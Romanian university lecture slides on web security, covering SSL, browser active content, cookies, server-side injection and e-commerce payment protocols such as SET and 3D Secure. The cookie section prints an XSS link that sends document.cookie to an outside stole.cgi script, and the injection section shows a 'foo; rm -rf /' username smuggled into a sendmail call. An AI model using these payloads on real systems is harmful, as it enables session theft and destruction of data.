atentatele phishing. In 2004, intr-un experiment cu un astfel de atac,
80% dintre studentii uneia dintre academiile militare a raspuns cu
date personale. Este necesara certificarea in prealabil fara a
introduce date.

• Technical responses – implementarea de masuri de combatere in


browsere. Printre masuri se pot enumera: utilizarea SSL pentru
autentificare server, utilizarea autoritatilor de certificare, includerea
de filtre anti phishing, introducerea de parole numai arunci cand se
justifica (ex, la Bank of America se cere utilizatorului sa introduca
parola numai dupa ce banca a afisat o imagine proprie utilizatorului).

• Legal responses – adaptarea legislatiei la conditiile actuale de


utilizare IT.

11
Securitate web (Web Security)

Motivatie:
• Necesitatea transmiterii pe Internet a documentelor private.

Metode:
• Utilizarea criptografiei. SSL (Secure Sockets Layer) este un
acronim asociat unui protocol web dezvoltat de Netscape pentru
a transmite documente private prin Internet.
• SSL utilizeaza un sistem criptografic cu doua chei pentru a cripta
datele — una publica, cunoscuta de oricine, si una privata,
secreta, cunoscuta numai de destinatar.
• Foarte raspandit, majoritatea browserelor Web suporta SSL si
multe site-uri utilizeaza protocolul pentru a obtine informatii
confidentiale, cum ar fi numere de card de credit. Prin conventie,
URL-urile care au nevoie de o conexiune SSL incep cu https: in
loc de http:.
• SSL creeaza o conexiune securizata intre un client si un server,
peste care pot fi trimise datele in siguranta.

1
Securitate web (2)

• Un alt protocol de transmitere a datelor in siguranta este Secure


HTTP (S-HTTP).
• S-HTTP este proiectat pentru a transmite mesaje individuale in
siguranta.
• SSL si S-HTTP, prin urmare, poi fi percepute mai degraba ca
tehnologii complementare decat concurente.
• Criptarea nu garanteaza securitatea web!

• Pentru a avea o conexiune SSL de incredere se pun intrebarile:


– Ce trebuie sa cunoasca serverul despre client?
– Ce trebuie sa cunoasca clientul despre server?

2
Caracterizare generala SSL

Cunostintele serverului despre clienti:

• Ce spune protocolul SSL serverului? Cu exceptia cazului in care


sunt utilizate certificate client-side, nu spune absolut nimic!
• SSL realizeaza o legatura securizata (secure pipe). Cineva este la
celalalt capat, dar nu se cunoaste cine.

Ce se intampla?
• Teoretic, la platile cu card de credit se atasaza un ordin semnat
• Acelasi lucru incearca sa faca Netscape cu SSL: un mod de
asociere a unui certificat client care este legat de cartea de credit si
care nu are numarul cartii de credit in certificat

3
SSL

• Original, SSL a fost dezvoltat de Netscape, pentru a asigura


securitatea datelor transportate si rutate de HTTP, LDAP, POP3.

• SSL utilizeaza TCP pentru a furniza o conexiune sigura si


autentificata intre cele doua puncte ale retelei (clientul si serverul).

HTTP LDAP POP3

SSL
TCP/IP

Localizare SSL

4
SSL - Obiective

Obiectivele principale ale protocolului SSL sunt:

• Autentificarea clientului si serverului unul fata de celalalt. SSL


permite utilizarea tehnicilor standard de criptare (cu cheie publica)
pentru a permite autentificarea celor doua parti. Desi cele mai
frecvente aplicatii constau in autentificarea unui serviciu client pe
baza unui certificat, SSL poate folosi aceste metode si pentru a
autentifica clientul.

• Asigurarea integritatii datelor: in timpul unei sesiuni datele nu pot fi


falsificate.

• Asigurarea confidentialitatii datelor: datele de transport dintre client


si browser trebuie protejate de interceptare si citire. Acest lucru este
necesar atat pentru datele asociate cu protocolul insusi (securizarea
traficului in timpul negocierii) cat si pentru datele aplicatiei care sunt
transmise in timpul sesiunii. Privit din acest punct de vedere SSL
este mai mult un set de protocoale.

5
SSL - Arhitectura

SSL poate fi vazut ca fiind divizat pe 2 niveluri:


• Un protocol care asigura securitatea si integritatea datelor SSL
Record Protocol (Protocolul de inregistrare SSL)
• Un protocolul care stabileste conexiunile SSL. La acest nivel se
utilizeaza alte 3 protocoale: Protocolul SSL Handshake (Protocolul
dialogului de confirmare), Protocolul SSL Change Cipher (Protocolul
de schimbare cifru SSL) si Protocolul SSL Alert (Protocolul de alerta
SSL).
SSL SSL Change SSL Protocol la nivel
Handshake Cipher Alert aplicatie ex: HTTP
SSL Record
TCP (nivel transport)
IP (nivel retea)

Stiva SSL

6
SSL – protocoale componente

• Scopul protocolului SSL Record este preluarea unui mesaj al


aplicatiei si transmiterea lui in retea, prin protocolul TCP.

• SSL Record serveste ca baza pentru protocoalele de la nivelurile


superioare.

• Protocolul SSL Record este responsabil de criptarea si integritatea


datelor.

• SSL Record este folosit pentru incapsularea datelor trimise de alte


protocoale.

• SSL Record este implicat in sarcinile de verificarea a datelor.

• Protocoalele de pe nivelul superior se ocupa de managementul


sesiunilor, managementul parametrilor de criptare si de transferul
mesajelor SSL intre client si server.

7
Protocolul SSL Record

Crearea pachetelor SSL Record:


• Fragmentare
Date initiale
• Incapsulare
• Creare obiect (record)
Data 1 Data 2 Data 3
• Criptare obiect
• Transmitere Date comprimate
Cod
criptare MAC

Date criptare

Pachet TCP

8
Calcul MAC

Fragmentarea se face in blocuri de cel mult 214 octeti. Calcularea MAC


este definita astfel:
Hash(MAC_write_secret+pad_2+hash(MAC_write_secret+pad_1+seq_num+
SSL.Compressed.type+SSL.Compressed.length+SSL.Compressed.fragment))
in care:
• + = operator de concatenare
• MAC_write_secret = cheie secreta simetrica
• hash = algoritm pentru hash: MD5 sau SHA-1
• pad_1= octetul 36H repetat de 48 de ori pentru MD5 sau de 40 de ori pentru SHA-1
• pad2 = octetul 5CH repetat de 48 de ori pentru MD5 sau de 40 de ori pentru SHA-1
• seq_num = numarul de secventa al mesajului
• SSL.Compressed.type = protocolul de nivel superior care proceseaza fragmentul
• SSL.Compressed.length = lungimea fragmentului
• SSL.Compressed.fragment= fragmentul dupa compresie (daca nu se foloseste
compresia, textul clar)

Blocul care rezulta prin adaugarea MAC la fragmentul compresat este


criptat cu un algoritm de criptare simetrica, de exemplu: IDEA, DES,
3DES, Fortezza.
9
Protocoalele Alert si Change Cipher

• Protocolul Alert este folosit de catre una dintre parti pentru a transporta
mesajele in timpul sesiunii.

• Fiecare mesaj din protocolul Alert este alcatuit din 2 octeti:


– Primul octet contine o valoare 1- “warning” sau 2- “fatal”, care determina
importanta mesajului trimis. Trimiterea unui mesaj avand statutul de “fatal” de
oricare dintre parti va duce la terminarea imediata a sesiuniii SSL.
– Al doilea octet al mesajului contine unul din codurile de eroare, care poate
aparea in timpul unei sesiuni de comunicare.

• Protocolul Change Cipher (Protocolul de schimbare de cifru) este folosit de


catre una dintre parti pentru a transporta mesajele in timpul sesiunii
• Este cel mai simplu dintre protocoalele membre SSL.
• Contine un singur mesaj cu valoarea 1. Acest tip de mesaj este trimis de la
client catre server si invers.
• Dupa schimbul de mesaje se stabileste o sesiune.
• Acest mesaj si orice alte mesaje sunt transferate folosind protocolul SSL
Record.

10
SSL - Protocolul Handshake

• Este cea mai complexa componenta a protocoalelor componente


SSL.
• Este utilizat pentru a initia o sesiune intre un server si un client.
• Sunt negociate mai multe componente, cum ar fi algoritmul si cheile
folosite pentru criptarea datelor.
• Folosind acest protocol este posibila autentificarea partilor una fata
de cealalta si negocierea parametrilor sesiunii.

• Procesul de negociere se desfasoara pe parcursul a patru faze.


– Faza 1: initierea unei conexiuni logice intre client si server, urmata de
negocierea parametrilor
– Faza 2: inceperea negocierii de autentificare a serverului de catre client
– Faza 3: verificarea certificatului serverului si a celorlalti parametri
transmisi de catre server
– Faza 4: Confirmarea mesajului primit si verificarea datelor. La succes se
incepe transmisia datelor intre client si server.

11
Schema protocol negociere (1)

Faza 1
Hello-client

Client Hello-server Server

Mesajul Hello-client.
Clientul trimite un mesaj de salut serverului care contine date cum ar fi:
• cea mai noua versiune SSL pe care o foloseste
• date aleatoare folosite pentru protectia cheii de sesiune;
• id-ul sesiunii : numarul de identificare al sesiunii. O valoare diferita
de 0 indica faptul ca un client doreste sa actualizeze parametrii
conexiunii sau sa stabileasca o noua conexiune a acestei sesiuni. O
valoare egala cu 0 indica dorinta clientului de a stabili o noua
conexiune
• lista cu cifruri : o lista de algoritmi de criptare si metode de schimb
ale cheilor suportate de catre client.

12
Schema protocol negociere (2)

Mesajul Hello-server
Serverul, ca mesaj de raspuns trimite clientului, de asemenea, un
mesaj de salut continand aceleasi campuri ca la mesajul primit:

• versiunea: cea mai veche versiune a protocolului SSL suportata de


care server;

• date aleatoare (pentru protectia mesajului)

• id-ul sesiunii: daca campul clientului este diferit de 0 se pastreaza


valoarea, altfel id-ul de sesiune al serverului contine o valoare
pentru o sesiune noua

• Lista de cifruri: o multime de protocoale selectate de server dintre


cele propuse de client. Primul element al acestui camp este metoda
aleasa pentru schimbul cheilor de criptare, urmatorul element
specifica algoritmul de criptare si functiile hash care vor fi folosite.

13
Schema protocol negociere (3)

• In faza 2: Serverul incepe


urmatoare faza a negocierii
Client Server
trimitand certificatul sau pentru a fi Certificat
autentificat de catre client. Acest
pas nu este obligatoriu si poate fi Transmitere
omis daca metoda negociata cheie server
pentru schimbul de chei nu cere
transmiterea certificatului. Pasul Cerere certificare
final al fazei 2 este mesajul de server
raspuns al serverului. Dupa
trimiterea acestui mesaj se
asteapta un raspuns.

14
Schema protocol negociere (4)

• In faza 3: La finalul fazei 2


clientul a primit mesajul de la
server si clientul va trebui sa Client Server
Certificat
verifice certificatul serverului,
precum si ceilalti parametri Verificare
transmisi de server odata cu certificat
mesajul de salut.
Transmitere
cheie certificat

15
Schema protocol negociere (5)

Faza 4, consta in confirmarea mesajului primit


si verificarea datelor.
Client Server
• Clientul trimite un mesaj cu lista de cifruri si Schimb cifru
apoi fixeaza parametrii si cheile algoritmilor,
clientul trimite mesajul de inchidere care este
protejat prin intermediul algoritmului si cheilor Stop
secrete. Astfel se confirma daca parametrii
negociati si datele sunt corecte. Schimb cifru
• Serverul, ca raspuns al mesajului client trimite
aceeasi secventa de mesaje. Daca mesajul de Stop
final este corect atunci datele transmise,
algoritmii negociati si cheia de sesiune sunt
corecte. Acestea indica faptul ca sesiunea s-a
terminat si este posibila transmiterea datelor
aplicatei intre client si server prin SSL. In final,
sesiunea TCP intre client si server este inchisa.

16
Comentarii SSL

• Tehnologie care permite securizarea unei semnaturi fara sa se


utilizeze parola;
• Permite o identificare a site-ului la care se conecteaza fara
ajutorul unei terte parti
• Toate acestea pot fi facute utilizand certificate SSL client
• Cand se viziteaza o pagina protejata SSL uzual browserul verifica
identitatea site-ului prin verificarea certificatului. Site-ul indepartat
este capabil sa verifice identitatea utilizand un certificat furnizat in
prealabil
• Siteurile pot face ca browserul sa genereze perechea de chei
• Certificatul este pastrat in browser si browserul il va trimite la orice
site securizat care cere acest lucru.
• Site-ul la randul sau iti poate verifica calitatea de proprietar al
cheii private asociate prezentului certificat.

17
Web browser security

• Browserele web constituie una dintre cele mai utilizate aplicatii, ca


urmare este extrem de importanta cunoasterea vulnerabilitatilor
acestora.
• Statistica publicata pe 10 feb 2009. Dau mai jos rezultatele cu
mediile pe zi realizata dupa o monitorizare in ultimele 365 de zile a
vulnerabilitatilor principalelor browsere.
• Valorile “High severity” includ vulnerabilitatile raportate marcate ca
“highly critical” si mai mult. Nivelul “Relative danger” a fost calculat
prin adaugarea patratului nivelului la fiecare vulnerabilitate
raportata (ne critica=1², extrem de critica=5²).

Internet explorer Firefox Safari Opera

Vulnerability reports 38 5 2 0
High severity vulnerability 1 0 0 0
reports
Vulnerability issues 40 6 3 0
Relative danger 161 19 8 0
18
Caracteristici ale securitatii la browsere

Componente implicate in securitatea browserelor web:


• Interfata utilizator;
• Erori ale codului browser;
• Continutul activ al paginilor interpretat de catre browser.

Scopul atacatorilor:
• Furt de informatii personale, in special parole pentru
informatii financiare;
• Crearea de “roboti” pe calculator ce pot fi utilizati pentru
atacuri DoS, trimiterea de spam, gazduirea de phishing web
site.

De ce sunt browserele nesigure?


• Sarcina lor este complexa
• Standardele in web sunt multe inca in curs de definire
19
Tipuri de continut activ

Pentru a creste functionalitatea si a imbunatati designul de foarte multe


ori in siteuri web sunt incluse scripturi care executa programe in
browser (client side). Din nefericire aceste scripturi sunt o cale prin
care atacatorii incarca si executa cod rau intentionat pe masina
utilizatorului.
• Javascript – uzual si usor de incorporat. Un atac uzual Javascript
este redirectionarea utilizatorilor de la un site legitim la unul malitios
care poate distribui virusi si colecta informatii personale.
• Controale Java si ActiveX – Spre deosebire de JavaScript,
controalele Java si ActiveX sunt programe care se gasesc pe
propriul calculator si pot fi descarcate in browser. Controalele Active
X pot executa orice pe un calculator. Appleturile Java ruleaza in
mediu mai restrans, dar daca nu este de incredere poate crea
oportunitati atacatorilor.
• Paginile web contin programe sau referinte la acestea;
• Unele pagini invita utilizatorii: “please install this plug-in”, adica un
program;
• Toate formele de continut activ sunt utilitarele obisnuite ale
atacatorilor. Daca sunt dezactivate probabil site-ul nu poate fi folosit
corect.
20
Javascript si AJAX

Javascript:
• Nu are legatura cu Java – initial s-a numit LiveScript;
• Sursa celor mai multe brese de securitate in Firefox si IE;
• Nu este clar modelul de securitate;
• Legaturi puternice intre scripturi de atac aflate pe siteuri diferite.

AJAX:
• Ajax – Asynchronous Javascript si HTML;
• Permite realizarea de pagini extrem de interactive;
• Implicatiile de securitate pentru client si server sunt inca destul de
neclare, dar este clar ca se creeaza premise.

21
Active X

Active X – caracteristici:
• Cea mai mare eroare de design la continut activ: ruleaza cu
permisiuni complete;
• Peste 1000 de controale
• Translatia: extrem de multe posibilitati de atac

Descarcarea controalelor active X:


• Orice pagina web poate descarca alte controale;
• Translatia: o pagina web poate descarca o bucata de cod arbitrara
pentru a o rula la un utilizator;
• Singura protectie este o semnatura digitala in codul descarcat;
• Nu sunt restrictii pentru ceea ce poate face codul.

De ce ActiveX?
• Poate fi utilizat cu succes la Windows Update;
• Numai IE are ActiveX, este singura mare diferenta intre IE si Firefox.
22
Autentificarea continua

• Autentificarea initiala este realizata prin parola;


• Ea poate fi continuata prin:
– Cookies: text special formatat trimis de server unui browser la
fiecare conectare, browserul retrimite textul serverului pentru
autentificare. Problema: Se colecteaza date despre calculatorul
utilizatorului (adresa IP, domeniul la care este conectat, tip de
browser, preferinte, profil ..)
– Valori ascunse: informatiile protejate sunt incluse in pagina in
campuri ascunse si trimise catre server printr-o metoda HTTP
• Ambele metode au limitari, problema fundamentala vine de la faptul
ca ambele sunt trimise de clienti ce nu sunt de incredere

Clienti nesiguri (Untrusted)


• Un site web este interesat in identificarea utilizatorilor;
• Acest lucru stimuleaza utilizatorii in a trisa;
• Scopul site-ului web este de a face imposibila trisarea de catre client
• Un site web nu controleaza software-ul instalat la client

23
Protejarea informatiei de identificare

• Dupa ce utilizatorul se logheaza se creaza un sir de caractere care


contine user-id;

• Criptarea este optionala, dar generarea MAC cu cheie cunoscuta


doar de server este obligatorie si rezultatul este transmis clientului

• Cand sirul este trimis la server se valideaza MAC si se decripteaza


pentru a vedea cine este clientul

• Doar serverul cunoaste aceste chei, deci numai serverul poate crea
siruri de caractere protejate

• Optional: se poate include timestamp, adresa IP, etc

Valorile ascunse in URL sunt vizibile in fisierele log.

24
Cookies

Caracteristici:
• Folosit uzual
• Permite utilizatorilor sa reintre pe un site (sa se identifice)
• Session cookies – pastreaza informatiile numai pe durata utilizarii
browser-ului. La inchiderea acestuia informatia este stearsa
• Persistent cookies – se pastreaza pe propriul calculator, poate fi
ajustat intervalul de timp de pastrare a datelor (ex. email account –
pagina personalizata la deschidere mail, pagina web favorita..).
• Stocati pe harddiscurile utilizatorului (pot fi copiati usor).
Protectia datelor de autentificare:
• La autentificarea continua datele de autentificare sunt de cele mai
multe ori necriptate
• Cele mai multe site-uri nu doresc incarcarea suplimentara cu SSL
pentru orice
• Credentialele sunt usor de furat
• Apararea uzuala: limitarea duratei de viata; reautentificarea inainte
de face lucruri foarte sensibile din punctul de vedere al sigurantei.

25
Dezavantaje cookies (1)

Identificarea imprecisa:
• Daca pe un calculator sunt folosite mai multe browsere, fiecare va avea
cookie-urile sale. Un cookie nu identifica persoana, ci combinatia cont de
utilizator, calculator, browser.
• Nu se poate face diferenta dintre doi utilizatori care folosesc acelasi
calculator si browser (daca nu folosesc conturi de utilizator locale diferite).
Interceptarea cookie:
• Sesiunile HTTP obisnuite sunt vizibile tuturor calculatoarelor din retea, care
pot intercepta pachetele de date. Aceste cookie-uri nu pot contine deci
informatii confidentiale. O solutie posibila este HTTPS.
• „Cross-site scripting” (XSS) permite trimiterea unui cookie altor servere, care
in mod normal nu ar trebui sa-l primeasca. Browser-ele moderne permit
executarea unor fragmente de cod primite de la server; daca cookie-urile pot
fi accesate in timpul executiei, ele ar putea fi trimise altor servere decat cele
„autorizate”. Criptarea nu ajuta impotriva acestui gen de atac. Metoda este
de obicei folosita pe site-uri care permit utilizatorilor sa trimita continut
HTML.
• Folosind un fragment de cod, un utilizator rau-voitor poate sa primeasca
cookie-uri ale altor utilizatori si cu ajutorul lor se poate conecta ca sa
pacaleasca serverul care crede ca altcineva s-a autentificat.

26
Dezavantaje cookies (2)

„Otravirea” cookie-urilor:
• „Otravirea” cookie-urilor: un atacator trimite unui server un cookie invalid (un
cookie primit de la server, dar modificat).
• Cookie-urile ar trebui sa fie retinute si trimise serverului neschimbate; un
atacator poate sa le modifice si apoi sa le trimita serverului
• Efect: Daca un cookie retine suma care trebuie platita pentru cumparaturi
schimbarea acestei valori ar putea permite cumpararea unor bunuri la un
pret mult mai mic.
• Cele mai multe site-uri retin cu ajutorul cookie-urilor doar un identificator de
sesiune (un numar unic generat aleator) care identifica sesiunea. El
reprezinta un index intr-o tabela interna a serverului, in care se retin valorile
cu adevarat importante, cum ar fi pretul unor cumparaturi, etc.
Cookie inter-site:
• Fiecare site ar trebui sa aiba acces doar la cookie-urile proprii
• Erori in programarea browsere-lor pot duce la incalcarea acestei reguli
• Situatie similara trimiterii de cookie-uri modificate, dar nu este atacat
serverul, ci un utilizator foloseste un browser vulnerabil.
• Prin ele se poate fura identificatorul de sesiune si atacatorul poate sa se
„autentifice” in locul utilizatorului de buna credinta.

27
Alternative la cookie

In cazul in care browserul este configurat sa nu accepte cookie sunt


posibile alternative:

• Adresa IP (sa permita incarcarea paginilor daca cererea vine de la o


anumita adresa) este putin precisa, probleme cu NAT.
• URL (query string) ceva mai precisa se bazeaza pe introducerea
informatiei in adresa URL. Partea denumita „query string” este
folosita de obicei, dar se pot folosi si alte sectiuni. Mecanismul
sesiunilor PHP foloseste aceasta metoda daca cookie-urile nu sunt
activate.
• Autentificare HTTP Protocolul HTTP include mecanisme care permit
accesarea unei pagini Web doar dupa furnizarea unui nume de
utilizator si a unei parole, pe care browser-ul le retine si le transmite
server-ului la fiecare cerere, fara sa fie introduse de fiecare data; din
punctul acestuia de vedere, lucrurile se desfasoara ca si in cazul
folosirii cookie-urilor. Transmiterea parolei (si chiar a numelui de
utilizator) de fiecare data cand este ceruta o pagina este destul de
nesigura: acest trafic poate fi interceptat.

28
Alternative la cookie (2)

• Obiecte Locale Adobe Flash. Daca un browser foloseste plugin-ul


Adobe Flash Player functia de salvare locala a unor obiecte poate fi
folosita intr-un mod foarte asemanator cookie-urilor. Aceasta poate fi
o optiune atragatoare pentru dezvoltatorii de pagini Web, pentru ca
majoritatea utilizatorilor folosesc acest plugin. In plus, configurarile
sunt separate de cookie-uri, deci stocarea locala a obiectelor poate fi
activata, iar cookie-urile dezactivate. Din pacate are alte probleme de
securitate (chiar mai importante).

• Alte metode de a stoca date local Unele browsere suporta un


mecanism prin care paginile Web isi pot stoca local unele date printr-
un script. IE poate fi folosit pentru a stoca date intr-o pagina Web
salvata pe hard local, intr-un document XML, sau in sectiunile
„Favorites” ori „History” ale browser-ului.

• window.name Daca Javascript este activat, proprietatea name a


obiectului window poate fi folosita pentru a stoca local date,
deoarece aceasta ramane neschimbata la incarcarea succesiva a
unor pagini Web. Metoda este mai putin cunoscuta si folosita.

29
Furt cookie

• Furt cookie. In general cookie-urile sunt trimise doar serverelor care le-au
creat, pentru a le „fura” browser-ul trebuie sa le trimita altor servere.
• Scripturile JavaScript au de obicei acces la toate cookie-urile stocate de
browser, si pot sa le trimita oriunde. De ex, cel care detine domeniul
example.com poate scrie pe un alt site o legatura :
– <a href="#“ onclick="window.location='http://example.com/stole.cgi?text=
'+escape(document.cookie); return false;">Click here!</a>
• Cand un utilizator apasa pe acest link, browserul inlocuieste
document.cookie cu lista cookie-urilor active pe acel site, care ajung astfel la
serverul example.com, si asa are acces la cookie-urile utilizatorilor sitului pe
care a pus link-ul.
• Atac imposibil de prevenit de browser, pentru ca scriptul vine chiar de la
serverul care a creat cookie-urile, si totul pare a fi autorizat de acel server.
• Solutie: administratorii siturilor care permit utilizatorilor sa le modifice
continutul sa implementeze metode pentru respingerea acestui gen de
scripturi.
• Flagul HttpOnly nu le fac vizibile la programele client precum JavaScript. Ex:
– Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010
23:59:59 GMT; path=/; domain=.example.net; HttpOnly
• Cand browserul primeste un astfel de cookie, el trebuie sa il foloseasca in
mod obisnuit pentru schimburile HTTP urmatoare si sa nu-l faca vizibil
scripturilor.
30
Server-side Security

Serverele sunt tinte atragatoare cel putin din urmatoarele motive:


• Stergerea informatiilor stocate sau degradarea lor
• Furt de date (de regula date sensibile cum sunt cele de conturi
bancare);
• Distribuire “malware” la clienti care au incredere in acel site

Apararea standard:
• Verificarea tuturor intrarilor
• Constientizarea faptului ca nimic din ceea ce clientul trimite nu poate
fi considerat de incredere
• Verificarea periodica a site-ului (audit)

31
Scripturi server-side

• Majoritatea site-urilor web utilizeaza scripturi server-side: CGI, ASP,


PHP, Ruby, server-side include etc.;

• Fiecare din aceste scripturi este un serviciu de retea diferit;

• Pentru ca un site sa fie securizat toate scripturile lui trebuie sa fie


securizate;

• Ce context de securitate produc scripturile la rulare? Cum face


serverul protectia fisierelor sensibile in timpul executarii scripturilor
cu functionare dubioasa?

• Ultima problema atacata este o problema particulara cu scripturi


server side, cum ar fi PHP;

• Protectie partiala: utilizare de ceva similar cu suexec; rularea


scripturilor ca un utilizator diferit si rularea proceselor web server ca
utilizator web server implicit.
32
Injection Attacks; Curatire site

• Adesea, intrarile furnizate de utilizatori sunt utilizate pentru a construi


un fisier sau pentru o interogare SQL.

• SQL injection attack este o tehnica care exploateaza vulnerabilitatile


la nivel de database layer a unei aplicatii. Vulnerabilitatea se
manifesta cand intrarile utilizator sunt incorect filtrate pentru
caracterele escape.

• Utilizatorii rau intentionati pot trimite date false. (ex: in script care
trimite email colecteaza username si executa: /usr/bin/sendmail
username. Utilizatorul furnizeaza: foo; rm –rf / ca un username.
Codul ce se executa este: /usr/bin/sendmail foo; rm –rf /

• Rezultat: stergere continut sistem de fisiere

Curatire site:
• Stergerea scripturilor implicite nesecurizate (ex: nph-test-cgi la
Apache).
33
Securitatea sistemelor de
Comerţ electronic

Comerţul electronic poate fi definit ca un demers de cumpărare


sau vânzare prin intermediul transmiterii de date la distanţă.

Acest demers este specific politicii expansive a marketingului


companiilor comerciale.

Prin intermediul Internetului se dezvoltă o relaţie de servicii şi


schimb de mărfuri între ofertant şi viitorul cumparător.
Categorii generale de comerţ electronic:

• business-to-consumer - companiile vând produse şi servicii


consumatorilor individuali;
• business-to-business - companiile vând produse şi servicii altor
companii;
• consumer-to-consumer - participanţii de pe o piaţă online pot
să îşi vândă/cumpere reciproc bunuri;
• business-to-government - companiile pot vinde bunuri şi servicii
agenţiilor guvernamentale.

• procese de business - companiile menţin şi folosesc informaţii


pentru a identifica şi evalua clienţii, furnizorii şi angajaţii; în acelaşi
timp, partajează aceste informaţii, în mod atent controlat, cu clienţii,
furnizorii, angajaţii şi partenerii de afaceri;
Caracteristici plata electronica

• Valoarea platii trebuie sa depaseasca costul tranzactiei.


• Se pot face plati foarte mici (micro-payments) pentru mediile
in care este necesar acest lucru
• Anonimitatea cumparatorului, detaliile de plata este posibil sa
nu fie legate de cumparator fara detalii externe
• Asigura trasabilitate pentru urmarirea cumparaturilor suspecte
(alcool, medicamente, etc)
• Durata ciclului masurat de la initierea platii pana in momentul
transferului bancar.
• Instrument: credit card / debit card / Internet money

3
Forme si sisteme de plata electronice

Forme de plata electronice:


• Prepaid: contul platitorului (payer) este debitat înainte de
folosirea serviciului
• Pay-now: contul este debitat la livrarea serviciului.
• Pay later (postpaid): contul platitorului este debitat dupa livrarea
serviciului

Sisteme de plata: SET (Secure Electronic Transfer)


• Online cu digital cash
• Micropayments
• Card cu valoare stocata (smartcard)
• Cecuri electronice

4
Sisteme de plata: SET
(Secure Electronic Transfer)

Multe companii financiare elaborează un şir de aplicaţii personale


pentru efectuarea comerţului electronic şi în rezultat mai apare o
problemă, compatibilitatea acestor aplicaţii, adică asemenea
aplicaţii trebuie să aibă toţi participanţii la tranzacţie.
Pentru înlăturarea acestor probleme companiile VISA şi MasterCard
împreună cu alte companii inclusiv şi IBM, au determinat specificul
şi lista protocoalelor standartului SET.
Această specificare deschisă a devenit standartul comerţului electronic.
Semnătura digitală şi certificatele digitale asigură identificarea şi
autentificarea participanţilor la tranzacţia electronică.
Semnătura digitală de asemenea se foloseşte pentru asigurarea
integrităţii datelor.
Sisteme de plata: SET
(Secure Electronic Transfer)

SET asigură următoarele cerinţe speciale a securităţii operaţiunilor comerţului


electronic:
• confidenţialitatea rechizitelor de plată şi confidenţialitatea informaţiei despre
comandă, transmisă împreună cu datele de plată;
• păstrarea integrităţii datelor despre plăţi; integritatea este asigurată cu
ajutorul semnăturii digitale;
• utilizează un sistem criptografic special cu chee deschisă pentru efecturea
autentificării;
• autentificarea posesorului după card, care se asigură cu aplicarea
semnăturii digitale şi certificatelor posesorului de carduri;
• autentificarea vînzătorului şi a posibilităţilor de a primi plăţile pe carduri cu
utilizarea semnăturii digitale şi certificatelor vînzătorului;
• confirmarea situaţiei, că banca vînzătorului este o organizaţie reală, ce
activează şi poate primi şi efectua plăţi cu carduri prin reţeua cu sistem de
procesare; această confirmare este asigurată prin semnătura digitală şi
certificatelor băncii vînzătorului;
Sisteme de plata: SET
(Secure Electronic Transfer)

• efectuarea plăţilor în rezultatul autentificării certificatului cu cheea deschisă


pentru toate părţile participante la tranzacţie;
• pretecţia transmiterii datelor în majoritatea cazurilor cu ajutorul algoritmilor
criptografici.
• Prioritatea de bază a standartului SET faţă de celelalte sisteme existente
de asigurare a securităţii informaţionale constă în utilizarea certificatelor
digitale (standartul X509, versiunea 3), care asociază deţinătorul cardului şi
banca vînzătorului cu un şir de instituţii bancare ce utilizează sistemele de
plată VISA şi MasterCard. Set permite păstrarea relaţiilor existente dintre
bancă, deţinătorul de card şi vînzători, şi se integrează cu sistemele
existente, bazînduse pe următoarele calităţi:
• standart complet documentat pentru industria financiară;
• bazat pe standartele internaţionale a sistemelor de plăţi;
• bazat pe tehnologiile şi mecanizmele legislative ale industriei financiare
existente
Sisteme de plata: SET
(Secure Electronic Transfer)
• CyberCash (credit card);
• CyberCoin (monede electronice); sub 10 dolari, se cumpara monede
digitale pastrate la CyberCash;
• Smartcard cu valoare stocata:
– Mondex: nu utilizeaza banca drept intermediar;
– First Virtual: fara criptare, dar schimba mereu numarul cardului;
verificat prin e-mail.
– CyberCash Check (cecuri electronice):
– NetCheck: platitorul are carnet de cecuri de tip smartcard cu
PIN. Semnatura electronica. Cecul cu semnatura electronica,
împreuna cu factura, este transmis încasatorului, care-l
încaseaza de la banca.
• Payline / SG2: cardul trece printr-un gestionar securizat, nu trece pe
la comerciant.

8
Protocol SET

Scop
Stabilirea de tranzactii financiare care:
• Asigura confidentialitatea informatiilor;
• Asigura integritatea instructiunilor de plata pentru bunurile si
serviciile comandate;
• Autentifica detinatorul de card si comerciantul

Entitati
• Detinator de card (Cardholder)
• Comerciant (Merchant - web server)
• Banca Comerciant (payment gateway, acquirer)
• Banca detinator card

9
Mod lucru SET

Conditie: Comerciantul si cumparatorul sunt inregistrati la o CA


Pasi:
1. Clientul decide ce cumpara
2. Clientul trimite comanda si informatiile de plata (mesaj cu 2 parti)
– Comanda – pentru comerciant
– Informatii despre card – pentru banca comerciantului
3. Comerciantul trimite informatia despre card la banca sa
4. Banca comerciantului verifica cu cea a cumparatorului autorizarea
de plata
5. Banca cumparatorului trimite autorizarea la cea a comerciantului
6. Banca comerciantului trimite autorizarea la comerciant
7. Comerciantul completeaza comanda si trimite confirmare clientului
8. Comerciantul captureaza tranzactia de la banca sa
9. Cumparatorul tipareste chitanta pentru client

10
Securitatea cardurilor de credit

• Cartile de credit (cardurile bancare) sunt cele mai utilizate mijloace


de plată.

• Securitatea tranzactiilor s-a imbunatatit, insa nu semnificativ

• Bancile si furnizorii sistemelor de plata dezvolta noi metode de


securizare pentru a preintampina fraudele. Mai raspandite: codurile
CVC / CVV (cod format din 3-4 cifre, situat pe verso-ul cardului) sau
protocolul 3D Secure, ambele sunt utilizate la tranzactiile pe
Internet.

11
Roluri 3D Secure

Issuer (Emitent)
• Gestioneaza serviciul de inregistrare a detinatorului de card (inclusiv
verificarea identitatii fiecarui detinator la inregistrare) si autentifica
detinatorul de card la plata on-line
Acquirer (Achizitor)
• Asigura ca vanzatorul participant la tranzactia Internet opereaza sub
o intelegere cu Acquirer si furnizeaza procesarea tranzactiei pentru
autentificare
Interoperability (Interoperabilitatea)
• Faciliteaza schimbul de informatii intre cele doua domenii pe baza
unui protocol uzual si partajaza serviciile

Oferit de VISA şi MasterCard sub numele “Verified by VISA”,


respectiv “MasterCard SecureCode”

12
Arhitectura 3D Secure

13
Procesul de inregistrare (enrollment)

14
Exemplu tranzactie

15
Pasi (1)

• Pas 1 – cumparatorul creaza cosul de cumparaturi si declanseaza


procesul de plata;
• Pas 2 – Merchant Server Plug-in (MPI) trimite (Primary Account
Number) PAN si informatii despre device utilizator la Directory
Server (DS).
• Pas 3 - DS interogheaza Access Control Server (ACS). Pentru
autentificarea este disponibil PAN si tipul de device. Daca ACS nu
este disponibil DS trimite mesaj la MPI si sare la pas 5.
• Pas 4 - ACS raspunde catre DS
• Pas 5 - DS inainteaza raspunsul de la ACS sau cel propriu la MPI.
Daca nu s-a autentificat procesarea tranzactiei se incheie.
